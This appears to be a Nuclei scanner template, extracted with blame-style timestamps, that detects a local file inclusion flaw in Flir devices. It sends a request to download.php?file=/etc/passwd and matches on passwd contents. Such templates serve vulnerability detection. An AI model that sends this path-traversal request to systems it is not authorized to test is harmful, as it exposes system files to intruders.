2021-05-16 04:54:40 +00:00
|
|
|
id: flir-path-traversal
|
|
|
|
|
|
|
|
info:
|
2022-07-27 20:17:31 +00:00
|
|
|
name: Flir - Local File Inclusion
|
2021-05-16 04:54:40 +00:00
|
|
|
author: pikpikcu
|
|
|
|
severity: high
|
2022-07-27 20:17:31 +00:00
|
|
|
description: Flir is vulnerable to local file inclusion.
|
2022-04-22 10:38:41 +00:00
|
|
|
reference:
|
|
|
|
- https://juejin.cn/post/6961370156484263972
|
2022-07-27 20:17:31 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cwe-id: CWE-22
|
2021-05-16 04:54:40 +00:00
|
|
|
tags: flir,lfi
|
2023-04-28 08:11:21 +00:00
|
|
|
metadata:
|
|
|
|
max-request: 1
|
2021-05-16 04:54:40 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2021-05-16 04:54:40 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- "{{BaseURL}}/download.php?file=/etc/passwd"
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
|
|
|
|
- type: regex
|
|
|
|
regex:
|
2022-03-22 08:01:31 +00:00
|
|
|
- "root:.*:0:0:"
|
2021-05-16 04:54:40 +00:00
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|